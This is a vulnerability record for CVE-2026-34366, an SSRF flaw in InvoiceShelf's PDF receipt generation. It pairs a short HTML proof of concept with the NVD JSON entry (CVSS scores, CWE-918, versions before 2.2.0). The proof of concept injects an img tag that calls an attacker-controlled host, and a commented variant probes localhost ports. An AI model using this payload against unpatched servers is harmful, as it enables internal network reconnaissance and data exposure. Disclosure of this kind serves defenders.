CVE-2026-34366

<!-- PoC for CVE-2026-34366 InvoiceShelf SSRF --> <!-- Step 1: Log in to InvoiceShelf --> <!-- Step 2: Navigate to Payments and create or edit a payment --> <!-- Step 3: Insert the following HTML into the 'Notes' field --> <!-- To verify SSRF, replace with your Burp Collaborator or controlled server --> <img src="http://<attacker-controlled-domain>/ssrf_test.jpg" /> <!-- To scan internal ports (e.g., localhost port 80) --> <!-- <img src="http://127.0.0.1:80" /> --> <!-- Step 4: Save the payment and click to generate/download the PDF Receipt --> <!-- Step 5: Check your server logs for incoming requests from the victim -->

{"cve": {"id": "CVE-2026-34366", "sourceIdentifier": "[email protected]", "published": "2026-03-31T21:16:29.537", "lastModified": "2026-04-07T15:26:23.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InvoiceShelf is an open-source web & mobile app that helps track expenses, payments and create professional invoices and estimates. Prior to version 2.2.0, a Server-Side Request Forgery (SSRF) vulnerability exists in the Payment receipt PDF generation module. User-supplied HTML in the payment Notes field is passed unsanitised to the Dompdf rendering library, which will fetch any remote resources referenced in the markup. The vulnerability is exploitable directly via the PDF receipt endpoint, regardless of whether automated email attachments are enabled. This issue has been patched in version 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:invoiceshelf:invoiceshelf:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.0", "matchCriteriaId": "DF850775-DE65-40B0-9079-B1ABA4F1F4C9"}]}]}], "references": [{"url": "https://github.com/InvoiceShelf/InvoiceShelf/releases/tag/2.2.0", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/InvoiceShelf/InvoiceShelf/security/advisories/GHSA-38hf-fq8x-q49r", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}